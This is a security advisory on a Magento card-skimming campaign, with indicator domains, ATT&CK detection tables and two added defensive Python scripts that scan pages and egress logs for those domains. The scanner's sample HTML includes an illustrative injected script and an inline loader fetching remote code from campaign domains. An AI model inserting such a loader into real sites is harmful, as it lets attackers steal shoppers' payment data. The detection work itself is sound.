Digital Pickpockets: Inside the Massive Malware Campaign Targeting Magento

Tags: Malware Campaign, Magento Platform, Ecommerce Security, Payment Data Theft, Adobe Magento
A newly detected malware campaign is targeting online stores built on Magento, Adobe's widely used e-commerce platform. Researchers report that the campaign covertly steals payment information from shoppers across numerous affected sites.

Indicators of Compromise

luckipath.shop
statistall.com
analytlx.shop
statlstic.shop
statmaster.shop
vodog.shop
codcraft.shop
deslgnpro.shop
happywave.shop
codemingle.shop
artvislon.shop
trendset.website
datawiz.shop
pixelsmith.shop
salesguru.online

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION REF

T1189-Drive-by Compromise


ID | Data Source | Data Component | Detects
DS0015 | Application Log | Application Log Content | Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
DS0022 | File | File Creation | Monitor for newly constructed files written to disk to gain access to a system through a user visiting a website over the normal course of browsing.
DS0029 | Network Traffic | Network Connection Creation | Monitor for newly constructed network connections to untrusted hosts that are used to send or receive data.
DS0029 | Network Traffic | Network Traffic Content | Monitor for other unusual network traffic that may indicate additional tools transferred to the system. Use network intrusion detection systems, sometimes with SSL/TLS inspection, to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
DS0009 | Process | Process Creation | Look for behaviors on the endpoint system that might indicate successful compromise, such as abnormal behaviors of browser processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, or evidence of Discovery.
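The DS0015 guidance above (inspecting the resources a page requests for known-bad domains) applied to a storefront page. The following Python script is an added example and not part of the original advisory: it parses a page's HTML, collects every external host the browser would fetch from or post to (script, iframe, img, link, form and object tags) plus hostnames embedded in inline scripts, and matches them against the IOC list on this page, treating subdomains of an indicator as matches. The sample HTML is constructed for the example, and the inline loader in it is illustrative, not code recovered from the campaign.

```python
"""Added example: scan storefront HTML for references to the campaign's IOC domains."""
import re
from html.parser import HTMLParser
from typing import Optional
from urllib.parse import urlsplit

# Indicator domains copied from the IOC list on this page.
IOC_DOMAINS = frozenset({
    "luckipath.shop", "statistall.com", "analytlx.shop", "statlstic.shop",
    "statmaster.shop", "vodog.shop", "codcraft.shop", "deslgnpro.shop",
    "happywave.shop", "codemingle.shop", "artvislon.shop", "trendset.website",
    "datawiz.shop", "pixelsmith.shop", "salesguru.online",
})

# Tag attributes that make the browser fetch from, or post to, a remote host.
REMOTE_ATTRS = {
    "script": "src", "iframe": "src", "img": "src",
    "link": "href", "form": "action", "object": "data",
}

# Anything that looks like a hostname inside inline JavaScript; loaders often
# assemble their URL from string pieces instead of using a plain <script src>.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def matches_ioc(host: str) -> Optional[str]:
    """Return the IOC that `host` equals or is a subdomain of, else None."""
    labels = host.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        candidate = ".".join(labels[i:])
        if candidate in IOC_DOMAINS:
            return candidate
    return None


class _RefCollector(HTMLParser):
    """Collect remote references and inline <script> bodies from a page."""

    def __init__(self) -> None:
        super().__init__()
        self.refs = []            # (tag, url) for the attributes in REMOTE_ATTRS
        self.inline_scripts = []  # bodies of <script> blocks that have no src
        self._in_inline_script = False

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        wanted = REMOTE_ATTRS.get(tag)
        if wanted and attrs.get(wanted):
            self.refs.append((tag, attrs[wanted]))
        if tag == "script" and not attrs.get("src"):
            self._in_inline_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        if self._in_inline_script:
            self.inline_scripts.append(data)


def scan_storefront_html(html: str) -> list:
    """Return one finding per reference to an IOC domain found in `html`."""
    collector = _RefCollector()
    collector.feed(html)
    findings = []
    for tag, url in collector.refs:
        host = urlsplit(url).hostname  # None for relative paths such as /checkout/
        ioc = matches_ioc(host) if host else None
        if ioc:
            findings.append({"where": f"<{tag} {REMOTE_ATTRS[tag]}>", "host": host, "ioc": ioc})
    for body in collector.inline_scripts:
        for host in HOST_RE.findall(body):
            ioc = matches_ioc(host)
            if ioc:
                findings.append({"where": "inline <script>", "host": host, "ioc": ioc})
    return findings


# Constructed sample page: a Magento-style checkout with one injected remote
# script and one inline loader. Both are illustrative, not campaign code.
SAMPLE_HTML = """<!doctype html>
<html><head>
<script src="/static/frontend/Magento/luma/en_US/requirejs/require.js"></script>
<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Open+Sans">
<script src="https://cdn.statlstic.shop/js/stats.min.js"></script>
</head><body>
<form action="/checkout/" method="post"><input name="cc_number"></form>
<script>
  var s = document.createElement('script');
  s.src = '//' + 'vodog.shop' + '/l.js';
  document.head.appendChild(s);
</script>
</body></html>
"""

if __name__ == "__main__":
    for f in scan_storefront_html(SAMPLE_HTML):
        print(f"{f['where']:18} {f['host']:28} matches IOC {f['ioc']}")
```

Run it against the HTML of a live checkout page (for example the output of curl) rather than the CMS template: injected loaders are frequently added to the rendered page or to a served JavaScript bundle rather than to the theme files on disk. The label-by-label match catches hosts such as cdn.statlstic.shop without also flagging unrelated domains that merely end in the same string.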


T1056-Input Capture


ID | Data Source | Data Component | Detects
DS0027 | Driver | Driver Load | Monitor for unusual kernel driver installation activity.
DS0022 | File | File Modification | Monitor for changes made to files for unexpected modifications to access permissions and attributes.
DS0009 | Process | OS API Execution | Monitor for API calls to SetWindowsHook, GetKeyState, and GetAsyncKeyState.
DS0009 | Process | Process Creation | Monitor for newly executed processes conducting malicious activity.
DS0009 | Process | Process Metadata | Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow.
DS0024 | Windows Registry | Windows Registry Key Modification | Monitor for changes made to Windows Registry keys or values for unexpected modifications.


T1567-Exfiltration Over Web Service


ID | Data Source | Data Component | Detects
DS0015 | Application Log | Application Log Content | Review logs for SaaS services, including Office 365 and Google Workspace, to detect the configuration of new webhooks or other features that could be abused to exfiltrate data.
DS0017 | Command | Command Execution | Monitor executed commands and arguments that may use an existing, legitimate external Web service to exfiltrate data rather than the primary command and control channel.
DS0022 | File | File Access | Monitor for access to files that may then be exfiltrated through an existing, legitimate external Web service rather than the primary command and control channel.
DS0029 | Network Traffic | Network Connection Creation | Monitor for newly constructed network connections to web and cloud services associated with abnormal or non-browser processes.
DS0029 | Network Traffic | Network Traffic Content | Monitor and analyze traffic patterns and packet contents for protocols that do not follow the expected protocol standards and traffic flows (e.g., extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax or structure). Consider correlation with process monitoring and command-line data to detect anomalous process execution and command-line arguments associated with those traffic patterns (e.g., anomalies in the use of files that do not normally initiate connections for the protocol in question).
DS0029 | Network Traffic | Network Traffic Flow | Monitor network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.
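The network-traffic rows above (connections to untrusted hosts, and flows from processes that do not normally talk out or have never been seen before) turned into a small log check. This is an added example, not code from the page or from the campaign. It assumes a hypothetical JSON-lines egress log from the web server host with the fields ts, proc, method, dest and bytes_out; both the format and the log lines below are constructed for the example. It raises an alert for any destination matching the IOC list on this page, and a second, weaker alert for a sizeable POST by a process to a destination absent from a baseline window believed to be clean.

```python
"""Added example: flag outbound flows from a store's web server that resemble skimmer exfiltration."""
import json
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Indicator domains copied from the IOC list on this page.
IOC_DOMAINS = frozenset({
    "luckipath.shop", "statistall.com", "analytlx.shop", "statlstic.shop",
    "statmaster.shop", "vodog.shop", "codcraft.shop", "deslgnpro.shop",
    "happywave.shop", "codemingle.shop", "artvislon.shop", "trendset.website",
    "datawiz.shop", "pixelsmith.shop", "salesguru.online",
})


def matches_ioc(host: str) -> Optional[str]:
    """Return the IOC that `host` equals or is a subdomain of, else None."""
    host = host.lower().rstrip(".")
    for ioc in IOC_DOMAINS:
        if host == ioc or host.endswith("." + ioc):
            return ioc
    return None


def build_baseline(lines: List[str]) -> Dict[str, Set[str]]:
    """Destination hosts each process talked to during a window believed clean."""
    seen: Dict[str, Set[str]] = defaultdict(set)
    for line in lines:
        rec = json.loads(line)
        seen[rec["proc"]].add(rec["dest"].lower())
    return seen


def detect_exfil(lines: List[str], baseline: Dict[str, Set[str]],
                 min_post_bytes: int = 512) -> List[dict]:
    """Return alerts for (a) any flow to an IOC domain and (b) a POST of at least
    `min_post_bytes` by a process to a destination it never used in the baseline."""
    alerts = []
    for line in lines:
        rec = json.loads(line)
        dest = rec["dest"].lower()
        ioc = matches_ioc(dest)
        if ioc:
            alerts.append({"rule": "ioc-domain", "ioc": ioc, **rec})
            continue
        known = baseline.get(rec["proc"], set())
        if rec["method"] == "POST" and dest not in known and rec["bytes_out"] >= min_post_bytes:
            alerts.append({"rule": "new-post-destination", **rec})
    return alerts


# Constructed egress log in the hypothetical JSON-lines format described above.
# BASELINE_LOG is the window believed clean; REVIEW_LOG is the window under review.
BASELINE_LOG = [
    '{"ts":"2024-05-01T10:00:00Z","proc":"php-fpm","method":"POST","dest":"api.shipping.example","bytes_out":812}',
    '{"ts":"2024-05-01T10:00:05Z","proc":"php-fpm","method":"GET","dest":"updates.example","bytes_out":210}',
    '{"ts":"2024-05-01T10:01:00Z","proc":"cron","method":"POST","dest":"mail.example.com","bytes_out":4096}',
]
REVIEW_LOG = [
    '{"ts":"2024-05-02T09:12:01Z","proc":"php-fpm","method":"POST","dest":"api.shipping.example","bytes_out":790}',
    '{"ts":"2024-05-02T09:12:07Z","proc":"php-fpm","method":"POST","dest":"statistall.com","bytes_out":1930}',
    '{"ts":"2024-05-02T09:13:44Z","proc":"php-fpm","method":"POST","dest":"collect.metrics.example","bytes_out":2570}',
    '{"ts":"2024-05-02T09:14:00Z","proc":"php-fpm","method":"GET","dest":"static.cdn.example","bytes_out":180}',
]

if __name__ == "__main__":
    for alert in detect_exfil(REVIEW_LOG, build_baseline(BASELINE_LOG)):
        print(f"{alert['ts']} {alert['rule']:22} {alert['proc']:8} {alert['method']} {alert['dest']}")
```

The baseline set is what makes the "never been seen before" row actionable: a store's PHP workers normally post to a short, stable list of payment, shipping and tax endpoints, so a new POST destination is worth a look even when the host is not yet on any indicator list. Rebuild the baseline after legitimate integrations change, and raise min_post_bytes if small webhook calls produce noise.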


Observed Countries (5)

AU (2)
GB (159)
IN (219)
NL (960)
US (136)